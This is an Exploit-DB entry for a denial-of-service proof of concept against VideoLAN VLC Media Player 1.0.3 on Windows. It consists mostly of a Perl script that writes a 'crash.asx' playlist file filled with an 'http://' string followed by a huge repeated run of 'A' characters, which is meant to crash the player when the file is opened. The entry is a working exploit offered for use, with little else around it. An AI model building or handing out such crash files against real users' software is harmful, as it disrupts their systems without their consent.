VideoLAN VLC Media Player 1.0.3 - '.asx' Denial of Service (PoC)

Author: D3V!L FUCKER
type: dos
platform: windows
port: 
date_added: 2009-12-30  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comvlc-1.0.3-win32.exe  

raw file: 10840.pl  
#!/user/bin/perl
# Author: [D3V!L FUCKER]
# Tested on: [windows vista sp0]
# Code :
my $file= "crash.asx";

my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 500000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "Done..!~#\n";